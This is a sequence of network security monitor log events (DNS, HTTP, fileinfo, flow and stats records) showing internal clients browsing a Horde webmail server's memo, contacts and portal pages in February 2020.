{"timestamp":"2020-02-29T00:18:51.207491+0000","flow_id":1992764664025219,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52667,"proto":"UDP","dns":{"type":"answer","id":31596,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:51.299739+0000","flow_id":2049226304089160,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34876,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608}} {"timestamp":"2020-02-29T00:18:52.000255+0000","flow_id":720204489272861,"event_type":"flow","src_ip":"192.168.10.122","src_port":37890,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:51.634397+0000","end":"2020-02-29T00:13:51.742601+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:54.000424+0000","flow_id":902968232767834,"event_type":"flow","src_ip":"192.168.10.122","src_port":38101,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:53.127322+0000","end":"2020-02-29T00:13:53.235775+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:55.950562+0000","flow_id":171140185030946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35507,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54231,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:56.000204+0000","event_type":"stats","stats":{"uptime":14788,"capture":{"kernel_packets":136566,"kernel_drops":0},"decoder":{"pkts":136580,"bytes":93823981,"invalid":192,"ipv4":135045,"ipv6":10,"ethernet":136580,"raw":0,"null":0,"sll":0,"tcp":129608,"udp":5230,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2812,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2828,"synack":2819,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1849,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2394,"failed_udp":112},"tx":{"http":4720,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2474}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2453,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18777,"memcap_state":0,"memcap_global":0},"http":{"memuse":53216,"memcap":0}}} {"timestamp":"2020-02-29T00:18:56.058921+0000","flow_id":171140185030946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35507,"proto":"UDP","dns":{"type":"answer","id":54231,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:56.058921+0000","flow_id":171140185030946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35507,"proto":"UDP","dns":{"type":"answer","id":54231,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:56.259004+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7071}} {"timestamp":"2020-02-29T00:18:56.301097+0000","flow_id":2049226304089160,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34876,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20700,"tx_id":0}} {"timestamp":"2020-02-29T00:18:58.000810+0000","flow_id":1485649266158063,"event_type":"flow","src_ip":"192.168.10.122","src_port":43502,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:57.600559+0000","end":"2020-02-29T00:13:57.709068+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:00.241682+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7071},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38215,"tx_id":0}} {"timestamp":"2020-02-29T00:19:00.250216+0000","flow_id":1273696944968040,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38608,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":55762,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:00.358727+0000","flow_id":1273696944968040,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38608,"proto":"UDP","dns":{"type":"answer","id":55762,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:00.358727+0000","flow_id":1273696944968040,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38608,"proto":"UDP","dns":{"type":"answer","id":55762,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:00.445730+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3984}} {"timestamp":"2020-02-29T00:19:03.000378+0000","event_type":"stats","stats":{"uptime":14795,"capture":{"kernel_packets":136608,"kernel_drops":0},"decoder":{"pkts":136618,"bytes":93839609,"invalid":192,"ipv4":135083,"ipv6":10,"ethernet":136618,"raw":0,"null":0,"sll":0,"tcp":129642,"udp":5234,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2813,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2829,"synack":2820,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1850,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2396,"failed_udp":112},"tx":{"http":4722,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2476}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2454,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18850,"memcap_state":0,"memcap_global":0},"http":{"memuse":52604,"memcap":0}}} {"timestamp":"2020-02-29T00:19:03.009191+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3984},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19150,"tx_id":1}} {"timestamp":"2020-02-29T00:19:03.020774+0000","flow_id":97064884588838,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42079,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5765,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:03.129636+0000","flow_id":97064884588838,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42079,"proto":"UDP","dns":{"type":"answer","id":5765,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:03.129636+0000","flow_id":97064884588838,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42079,"proto":"UDP","dns":{"type":"answer","id":5765,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:03.235603+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4896}} {"timestamp":"2020-02-29T00:19:05.000328+0000","flow_id":880338066172632,"event_type":"flow","src_ip":"192.168.10.81","src_port":52770,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1095,"bytes_toclient":6726,"start":"2020-02-29T00:17:59.486104+0000","end":"2020-02-29T00:18:04.703495+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:05.227899+0000","flow_id":181357912881723,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38040,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":8765,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:05.336483+0000","flow_id":181357912881723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38040,"proto":"UDP","dns":{"type":"answer","id":8765,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:05.336483+0000","flow_id":181357912881723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38040,"proto":"UDP","dns":{"type":"answer","id":8765,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:05.357307+0000","flow_id":1222994856334552,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34880,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:19:05.357307+0000","flow_id":1222994856334552,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34880,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":18,"tx_id":0}} {"timestamp":"2020-02-29T00:19:06.004062+0000","flow_id":390853513012744,"event_type":"flow","src_ip":"192.168.10.122","src_port":37310,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:05.878088+0000","end":"2020-02-29T00:14:05.986371+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:06.940891+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4896},"app_proto":"http","fileinfo":{"filename":"\/turba\/browse.php","state":"CLOSED","stored":false,"size":24479,"tx_id":2}} {"timestamp":"2020-02-29T00:19:06.949852+0000","flow_id":769897281519196,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32844,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:07.058440+0000","flow_id":769897281519196,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56980,"proto":"UDP","dns":{"type":"answer","id":32844,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:07.058440+0000","flow_id":769897281519196,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56980,"proto":"UDP","dns":{"type":"answer","id":32844,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:07.518601+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20686}} {"timestamp":"2020-02-29T00:19:08.001030+0000","flow_id":779573836303470,"event_type":"flow","src_ip":"192.168.10.130","src_port":34864,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":16,"bytes_toserver":2187,"bytes_toclient":13917,"start":"2020-02-29T00:17:26.380014+0000","end":"2020-02-29T00:18:07.306799+0000","age":41,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:09.000565+0000","flow_id":2196762722510294,"event_type":"flow","src_ip":"192.168.10.130","src_port":34868,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1217,"bytes_toclient":8358,"start":"2020-02-29T00:18:03.337366+0000","end":"2020-02-29T00:18:08.631591+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:10.000202+0000","event_type":"stats","stats":{"uptime":14802,"capture":{"kernel_packets":136642,"kernel_drops":0},"decoder":{"pkts":136671,"bytes":93872046,"invalid":192,"ipv4":135136,"ipv6":10,"ethernet":136671,"raw":0,"null":0,"sll":0,"tcp":129689,"udp":5240,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2814,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2830,"synack":2821,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1851,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2399,"failed_udp":112},"tx":{"http":4725,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2479}},"flow_mgr":{"closed_pruned":2796,"new_pruned":17,"est_pruned":2455,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19512,"memcap_state":0,"memcap_global":0},"http":{"memuse":192948,"memcap":0}}} {"timestamp":"2020-02-29T00:19:10.358985+0000","flow_id":1222994856334552,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34880,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:19:11.635244+0000","flow_id":2024272545427820,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30835,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:11.743356+0000","flow_id":2024272545427820,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58238,"proto":"UDP","dns":{"type":"answer","id":30835,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:11.743356+0000","flow_id":2024272545427820,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58238,"proto":"UDP","dns":{"type":"answer","id":30835,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:11.811458+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:19:11.811458+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":221,"tx_id":0}} {"timestamp":"2020-02-29T00:19:11.823800+0000","flow_id":1783625527824888,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51082,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60096,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:11.928718+0000","flow_id":1783625527824888,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51082,"proto":"UDP","dns":{"type":"answer","id":60096,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:11.928718+0000","flow_id":1783625527824888,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51082,"proto":"UDP","dns":{"type":"answer","id":60096,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:12.005216+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5166}} {"timestamp":"2020-02-29T00:19:12.518903+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20686},"app_proto":"http","fileinfo":{"filename":"\/turba\/contact.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":3}} {"timestamp":"2020-02-29T00:19:16.000180+0000","flow_id":1132834899264066,"event_type":"flow","src_ip":"192.168.10.130","src_port":34872,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1079,"bytes_toclient":5842,"start":"2020-02-29T00:18:10.754242+0000","end":"2020-02-29T00:18:15.965476+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 